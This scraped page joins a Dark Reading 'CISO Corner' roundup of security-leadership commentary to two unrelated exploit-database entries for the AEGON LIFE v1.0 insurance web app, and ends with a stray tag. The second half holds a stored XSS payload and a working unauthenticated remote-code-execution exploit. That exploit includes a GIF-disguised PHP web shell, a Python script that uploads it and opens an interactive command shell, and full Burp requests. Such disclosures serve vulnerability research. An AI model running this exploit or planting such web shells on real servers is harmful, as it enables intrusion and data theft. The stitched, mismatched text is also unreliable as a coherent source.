**The CEO Is Next**

Commentary by Joe Sullivan, CEO, Ukraine Friends, & CEO, Joe Sullivan Security LLC

If CEOs want to avoid being the target of government enforcement actions, they need to take a personal interest in ensuring that their corporation invests in cybersecurity.

One day soon, a government agency will very publicly seek to hold a corporate CEO personally liable for a failure to ensure their organization invested sufficiently in cybersecurity. The surprising thing won't be that it happens, but rather how many people who work for and look up to the CEO will be happy when it does.

We're experiencing a movement toward regulation by enforcement. Look no further than the National Cybersecurity Strategy, which, at its core, demands that corporate America do more to protect citizens from cyberattacks. There's also the Securities and Exchange Commission's (SEC) action against the software company SolarWinds and its head of security. The case has raised eyebrows, specifically because the security leader was held personally responsible.

But with very few exceptions, the CISO or senior-most security leader is simply not the "responsible corporate officer.” It's the CEO. Security leaders rarely, if ever, get the budget needed to do their job well. CEOs and boards that do control the corporate budget rarely invest the time to understand their cyber-risks, and instead allocate resources in other directions.

Read more: The CEO Is Next

Related: White House Fills in Details of National Cybersecurity Strategy

**Why CIO & CISO Collaboration Is Key to Organizational Resilience**

Commentary by Robert Grazioli, Chief Information Officer, Ivanti

Alignment between these domains is quickly becoming a strategic imperative.

Gartner forecasts that the world will spend $215 billion on risk management and cybersecurity in 2024. That's a 14% increase over 2023. But many workers are feeling spread thin, with more data and endpoints than ever and not enough qualified talent to be found. It's time to finally break down the silos between IT and security.

That starts by fostering alignment between the CIO and chief information security officer (CISO).

Individually, CISOs and CIOs are powerful forces with a lot on their plates — and a lot on the line. Together, they could be unstoppable. However, historically, organizational structures have relegated CISOs and CIOs to separate domains with distinct — and occasionally contradictory — objectives.

Here's how to foster alignment: Why CIO & CISO Collaboration Is Key to Organizational Resilience

Related: CISO & CIO Convergence: Ready or Not, Here It Comes

**Rockwell's ICS Directive Comes as Critical Infrastructure Risk Peaks**

By Tara Seals, Managing Editor, News, Dark Reading

Critical infrastructure is facing increasingly disruptive threats to physical processes, while thousands of devices are online with weak authentication and riddled with exploitable bugs.

Industrial control systems (ICS) giant Rockwell Automation's recent directive to customers to disconnect their gear from the Internet showcases not just growing cyber risk to critical infrastructure, but the unique challenges that security teams face in the sector, experts say.

CISA is warning that increased threats to could lead to various catastrophic attacks, including denial-of-service (DoS) efforts that take down electrical grids; privilege escalation and lateral movement to burrow deeper into the operational technology (OT) environment in order to control it; modifying settings to, say, change safety thresholds for power generators; remotely compromising programmable logic controllers (PLCs) to halt water sector operations; or even conducting destructive Stuxnet-style attacks that can obliterate a site's ability to function permanently.

Yet thousands of devices are exposed online with weak authentication and riddled with exploitable bugs; and there's an endemic lack of security team participation in site design and asset/infrastructure management. All in all, it's not an ideal situation.

Read more: Rockwell's ICS Directive Comes as Critical Infrastructure Risk Peaks

Related: Volt Typhoon Hits Multiple Electric Utilities, Expands Cyber Activity

**4 Ways to Help a Security Culture Thrive**

DR Technology commentary by Ken Deitz, CSO/CISO, Secureworks

Creating and nurturing a corporate environment of proactive cybersecurity means putting people first — their needs, weaknesses, and skills.

A good cybersecurity culture trusts and empowers teammates to make good decisions. In turn, that trust fuels a more productive relationship between cybersecurity and the business. Culture is a living entity that needs to be continuously nurtured. Give it the dedication it needs, and your businesses will be safer as a result.

Here are some core pillars for establishing an effective security culture:

1\. Establish the Right Mindset: Focus on the positive actions that people can and should take.

2\. Engage with Empathy: A productive and inclusive security culture is one that shuns blame. Instead, focus on what you can collectively learn from the incident to enrich your cyber strategy for the future.

3\. Communicate, Communicate, Communicate: When it comes to cybersecurity, there's no such thing as too much communication. People have a lot going on in their jobs and lives. Meet people where they are, and you'll have much better results.

4\. Stay on Your Toes: New and emerging technologies bring opportunities and challenges. Generative artificial intelligence (AI), for example, can offer teammates productivity gains, but they also need to know the risks.

Read more: 4 Ways to Help a Security Culture Thrive

Related: How to Transform Security Awareness Into Security Culture

CISO Corner: Apple's AI Privacy Promises; CEOs in the Hot Seat

AEGON LIFE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599# Description:----------------A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.# Payload:----------------<script>alert(document.domain)</script># Attack Vectors:-------------------------To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.# Burp Suite Request:----------------------------POST /lims/insertClient.php HTTP/1.1Host: localhostContent-Length: 30423Cache-Control: max-age=0sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/lims/addClient.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_id"1716051159------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_password"password------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="name"<script>alert(document.domain)</script>------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"Content-Type: application/octet-streamÿØÿà

AEGON LIFE 1.0 Cross Site Scripting

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

Tag

#apple